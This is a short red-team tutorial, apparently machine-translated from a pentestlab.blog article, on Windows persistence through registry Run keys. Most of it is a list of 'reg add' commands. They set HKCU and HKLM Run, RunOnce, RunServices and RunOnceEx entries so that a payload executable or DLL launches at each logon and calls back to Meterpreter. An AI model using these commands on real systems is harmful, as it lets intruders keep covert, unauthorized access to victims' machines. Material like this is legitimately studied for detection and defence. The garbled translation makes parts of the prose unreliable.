Introduction: Creating the execution of arbitrary load during Windows logon registry key is one of the red team game manual oldest tricks.
The principle: the registry key can be added from the terminal to run key to achieve sustainability. These keys will contain a reference to the actual load will be executed when the user logs, is known to use this persistent threats and methods of using the red team the following registry location.
In the registry of the following four registry keys can be operated from the start.
1、reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
2、reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
3、reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
4、reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
When the current user's key operation, if the credentials have been promoted, it is best to use a local computer registry location instead of the current user, because the payload will be launched each time the system - more than we are in the registry execution, regardless of the user authentication system.
Local registrar registry as follows:
1、reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
2、reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
3、reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
4、reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\programdata\pentestlab.exe"
During the next logon, the payload will be executed with back to Meterpeter.
Further registry two positions, these positions may allow the red team or DLL payload persistence is achieved by performing arbitrary. These will be executed during login, and requires administrator-level privileges .
1、reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
2、reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"
There are other integration framework, such as the use of operating empire, metasploit tools and so can continue to refer to the following articles, which are written.
Reference https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/ article